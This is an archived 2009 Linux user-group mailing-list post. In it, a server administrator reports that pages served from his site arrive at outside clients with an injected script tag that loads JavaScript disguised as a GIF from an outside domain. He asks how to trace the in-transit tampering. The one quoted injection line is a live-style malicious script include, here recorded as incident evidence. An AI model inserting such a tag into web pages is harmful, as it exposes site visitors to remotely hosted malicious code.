Jaco Kroon on Sun, 3 May 2009 09:27:04 +0200 (SAST)


[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

[GLUG-tech] possible http threat - or just some weirdness


Hi all,

One of my clients just notified me of a "threat" on one of my servers,
when I request the site via mozilla firefox, the first lines reads as
follows:

<script language=javascript src=http://phpl.ca/Img/pen.gif></script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd";>
<html>

I get the same with wget from my desktop machine.

If I request this on the server itself using wget, I get this as is
without the first script line.

This to me (without going the tcpdump route on the server itself)
indicates that my data is being modified in transit!  Now, we all know
this is perfectly possible, the question is - how do I figure out where
this is happening, and which ISP I should get to clean up.  Based on my
incoming path this is either SAIX or IS, and I rather suspect it will be
SAIX's transparent proxies - but how do I confirm that?

If this wasn't happening on each and every single request I'd say we
have a possible split response http proxy poisoning attack but those are
generally not overly reliable and was still under heavy research last I
checked.

I've made a copy of pen.gif (which as expected turns out to be
javascript code).  What else should I be gathering around this?

Jaco

-- 
To unsubscribe: send the line "unsubscribe glug-tech" in the
subject of a mail to "glug-tech-request@xxxxxxxxxxxx".
Problems? Email "glug-tech-admins@xxxxxxxxxxxx". Archives are at
http://www.linux.org.za/Lists-Archives/
RULES: http://www.linux.org.za/glugrules.html